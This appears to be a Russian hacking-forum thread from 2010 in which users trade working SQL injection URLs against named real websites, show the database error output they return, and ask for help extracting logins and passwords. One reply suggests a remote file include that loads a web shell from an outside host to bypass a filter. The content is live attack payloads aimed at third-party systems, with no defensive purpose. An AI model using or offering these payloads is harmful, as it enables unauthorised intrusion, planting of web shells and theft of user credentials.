HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.04.2010, 18:02
[ DSU ]
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
С нами: 9765026

Репутация: 397
По умолчанию

мда
Цитата:
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%20and%20%28select%201%2 0from%28select%20count%28*%29,concat%28table_name, floor%28rand%280%29*2%29%29x%20from%20information_ schema.tables%20group%20by%20x%29a%29--
 
Ответить с цитированием

  #2  
Старый 11.04.2010, 18:03
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+fro m+information_schema.tables+group+by+concat(table_ name,floor(rand(0)*2)))--

Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'

все понел?
 
Ответить с цитированием

  #3  
Старый 11.04.2010, 18:07
[ DSU ]
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
С нами: 9765026

Репутация: 397
По умолчанию

Тоже самое выложил )))
 
Ответить с цитированием

  #4  
Старый 11.04.2010, 18:07
Deani
Познающий
Регистрация: 09.11.2009
Сообщений: 32
С нами: 8686925

Репутация: 3
По умолчанию

да, спасибо большое !
 
Ответить с цитированием

  #5  
Старый 11.04.2010, 18:24
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

как пути на сервере раскрыть ? есть доступ к phpmyadmin
phpmyadmin/phpinfo.php ничего не выводит...
кстати сервер под виндой
 
Ответить с цитированием

  #6  
Старый 11.04.2010, 18:27
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а
 
Ответить с цитированием

  #7  
Старый 11.04.2010, 19:00
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
/phpmyadmin/scripts/setup.php не доступен, этот файл удалён
 
Ответить с цитированием

  #8  
Старый 11.04.2010, 20:10
MastaBass1
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами: 8620050

Репутация: 0
По умолчанию

Не могу вытащить логины да пароли из слепой скули

http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23

на 6 поле этом вылетает пустая страница.
Знаю что вывод из скули такой:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

Версия:

http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) %20)a)%23&type=cabinet&action=lost_pw&mode=return_ from_hidden

Помогите вытащить пароли...нужно срочно....есть хочу=)))

Последний раз редактировалось MastaBass1; 11.04.2010 в 20:12..
 
Ответить с цитированием

  #9  
Старый 11.04.2010, 22:42
kirill1927
Новичок
Регистрация: 12.03.2009
Сообщений: 12
С нами: 9034597

Репутация: 2
По умолчанию

Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
Цитата:
Warning: require_once(sss\0funtions.php) [function.require-once]: failed to open stream: No such file or directory ....
есть ли возможность обойти фильтрацию ?
 
Ответить с цитированием

  #10  
Старый 12.04.2010, 05:10
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от kirill1927  
Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
есть ли возможность обойти фильтрацию ?
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.